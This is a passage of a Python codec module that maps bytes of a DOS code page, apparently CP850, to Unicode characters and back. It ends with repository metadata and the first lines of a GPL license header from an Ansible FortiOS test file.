u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x0084 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe5' # 0x0086 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x0089 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
u'\xef' # 0x008b -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xee' # 0x008c -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xec' # 0x008d -> LATIN SMALL LETTER I WITH GRAVE
u'\xc4' # 0x008e -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x008f -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xe6' # 0x0091 -> LATIN SMALL LIGATURE AE
u'\xc6' # 0x0092 -> LATIN CAPITAL LIGATURE AE
u'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x0094 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf2' # 0x0095 -> LATIN SMALL LETTER O WITH GRAVE
u'\xfb' # 0x0096 -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
u'\xff' # 0x0098 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\xd6' # 0x0099 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xf8' # 0x009b -> LATIN SMALL LETTER O WITH STROKE
u'\xa3' # 0x009c -> POUND SIGN
u'\xd8' # 0x009d -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd7' # 0x009e -> MULTIPLICATION SIGN
u'\u0192' # 0x009f -> LATIN SMALL LETTER F WITH HOOK
u'\xe1' # 0x00a0 -> LATIN SMALL LETTER A WITH ACUTE
u'\xed' # 0x00a1 -> LATIN SMALL LETTER I WITH ACUTE
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
u'\xf1' # 0x00a4 -> LATIN SMALL LETTER N WITH TILDE
u'\xd1' # 0x00a5 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xaa' # 0x00a6 -> FEMININE ORDINAL INDICATOR
u'\xba' # 0x00a7 -> MASCULINE ORDINAL INDICATOR
u'\xbf' # 0x00a8 -> INVERTED QUESTION MARK
u'\xae' # 0x00a9 -> REGISTERED SIGN
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\xa1' # 0x00ad -> INVERTED EXCLAMATION MARK
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\xc1' # 0x00b5 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0x00b6 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc0' # 0x00b7 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xa9' # 0x00b8 -> COPYRIGHT SIGN
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\xa2' # 0x00bd -> CENT SIGN
u'\xa5' # 0x00be -> YEN SIGN
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\xe3' # 0x00c6 -> LATIN SMALL LETTER A WITH TILDE
u'\xc3' # 0x00c7 -> LATIN CAPITAL LETTER A WITH TILDE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\xa4' # 0x00cf -> CURRENCY SIGN
u'\xf0' # 0x00d0 -> LATIN SMALL LETTER ETH
u'\xd0' # 0x00d1 -> LATIN CAPITAL LETTER ETH
u'\xca' # 0x00d2 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0x00d3 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0x00d4 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\u0131' # 0x00d5 -> LATIN SMALL LETTER DOTLESS I
u'\xcd' # 0x00d6 -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0x00d7 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0x00d8 -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\xa6' # 0x00dd -> BROKEN BAR
u'\xcc' # 0x00de -> LATIN CAPITAL LETTER I WITH GRAVE
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\xd3' # 0x00e0 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
u'\xd4' # 0x00e2 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xd2' # 0x00e3 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xf5' # 0x00e4 -> LATIN SMALL LETTER O WITH TILDE
u'\xd5' # 0x00e5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\xfe' # 0x00e7 -> LATIN SMALL LETTER THORN
u'\xde' # 0x00e8 -> LATIN CAPITAL LETTER THORN
u'\xda' # 0x00e9 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0x00ea -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0x00eb -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xfd' # 0x00ec -> LATIN SMALL LETTER Y WITH ACUTE
u'\xdd' # 0x00ed -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xaf' # 0x00ee -> MACRON
u'\xb4' # 0x00ef -> ACUTE ACCENT
u'\xad' # 0x00f0 -> SOFT HYPHEN
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u2017' # 0x00f2 -> DOUBLE LOW LINE
u'\xbe' # 0x00f3 -> VULGAR FRACTION THREE QUARTERS
u'\xb6' # 0x00f4 -> PILCROW SIGN
u'\xa7' # 0x00f5 -> SECTION SIGN
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\xb8' # 0x00f7 -> CEDILLA
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\xa8' # 0x00f9 -> DIAERESIS
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\xb9' # 0x00fb -> SUPERSCRIPT ONE
u'\xb3' # 0x00fc -> SUPERSCRIPT THREE
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a1: 0x00ad, # INVERTED EXCLAMATION MARK
0x00a2: 0x00bd, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x00cf, # CURRENCY SIGN
0x00a5: 0x00be, # YEN SIGN
0x00a6: 0x00dd, # BROKEN BAR
0x00a7: 0x00f5, # SECTION SIGN
0x00a8: 0x00f9, # DIAERESIS
0x00a9: 0x00b8, # COPYRIGHT SIGN
0x00aa: 0x00a6, # FEMININE ORDINAL INDICATOR
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00ad: 0x00f0, # SOFT HYPHEN
0x00ae: 0x00a9, # REGISTERED SIGN
0x00af: 0x00ee, # MACRON
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00fc, # SUPERSCRIPT THREE
0x00b4: 0x00ef, # ACUTE ACCENT
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x00f4, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b8: 0x00f7, # CEDILLA
0x00b9: 0x00fb, # SUPERSCRIPT ONE
0x00ba: 0x00a7, # MASCULINE ORDINAL INDICATOR
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00f3, # VULGAR FRACTION THREE QUARTERS
0x00bf: 0x00a8, # INVERTED QUESTION MARK
0x00c0: 0x00b7, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c1: 0x00b5, # LATIN CAPITAL LETTER A WITH ACUTE
0x00c2: 0x00b6, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c3: 0x00c7, # LATIN CAPITAL LETTER A WITH TILDE
0x00c4: 0x008e, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x00c5: 0x008f, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x00c6: 0x0092, # LATIN CAPITAL LIGATURE AE
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x00d4, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x00d2, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cb: 0x00d3, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00cc: 0x00de, # LATIN CAPITAL LETTER I WITH GRAVE
0x00cd: 0x00d6, # LATIN CAPITAL LETTER I WITH ACUTE
0x00ce: 0x00d7, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00cf: 0x00d8, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d0: 0x00d1, # LATIN CAPITAL LETTER ETH
0x00d1: 0x00a5, # LATIN CAPITAL LETTER N WITH TILDE
0x00d2: 0x00e3, # LATIN CAPITAL LETTER O WITH GRAVE
0x00d3: 0x00e0, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d4: 0x00e2, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d5: 0x00e5, # LATIN CAPITAL LETTER O WITH TILDE
0x00d6: 0x0099, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x00d7: 0x009e, # MULTIPLICATION SIGN
0x00d8: 0x009d, # LATIN CAPITAL LETTER O WITH STROKE
0x00d9: 0x00eb, # LATIN CAPITAL LETTER U WITH GRAVE
0x00da: 0x00e9, # LATIN CAPITAL LETTER U WITH ACUTE
0x00db: 0x00ea, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00dd: 0x00ed, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00de: 0x00e8, # LATIN CAPITAL LETTER THORN
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e1: 0x00a0, # LATIN SMALL LETTER A WITH ACUTE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e3: 0x00c6, # LATIN SMALL LETTER A WITH TILDE
0x00e4: 0x0084, # LATIN SMALL LETTER A WITH DIAERESIS
0x00e5: 0x0086, # LATIN SMALL LETTER A WITH RING ABOVE
0x00e6: 0x0091, # LATIN SMALL LIGATURE AE
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00eb: 0x0089, # LATIN SMALL LETTER E WITH DIAERESIS
0x00ec: 0x008d, # LATIN SMALL LETTER I WITH GRAVE
0x00ed: 0x00a1, # LATIN SMALL LETTER I WITH ACUTE
0x00ee: 0x008c, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x00ef: 0x008b, # LATIN SMALL LETTER I WITH DIAERESIS
0x00f0: 0x00d0, # LATIN SMALL LETTER ETH
0x00f1: 0x00a4, # LATIN SMALL LETTER N WITH TILDE
0x00f2: 0x0095, # LATIN SMALL LETTER O WITH GRAVE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f5: 0x00e4, # LATIN SMALL LETTER O WITH TILDE
0x00f6: 0x0094, # LATIN SMALL LETTER O WITH DIAERESIS
0x00f7: 0x00f6, # DIVISION SIGN
0x00f8: 0x009b, # LATIN SMALL LETTER O WITH STROKE
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fb: 0x0096, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x00fd: 0x00ec, # LATIN SMALL LETTER Y WITH ACUTE
0x00fe: 0x00e7, # LATIN SMALL LETTER THORN
0x00ff: 0x0098, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0131: 0x00d5, # LATIN SMALL LETTER DOTLESS I
0x0192: 0x009f, # LATIN SMALL LETTER F WITH HOOK
0x2017: 0x00f2, # DOUBLE LOW LINE
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
|
kustodian/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_vpn_ipsec_phase1.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
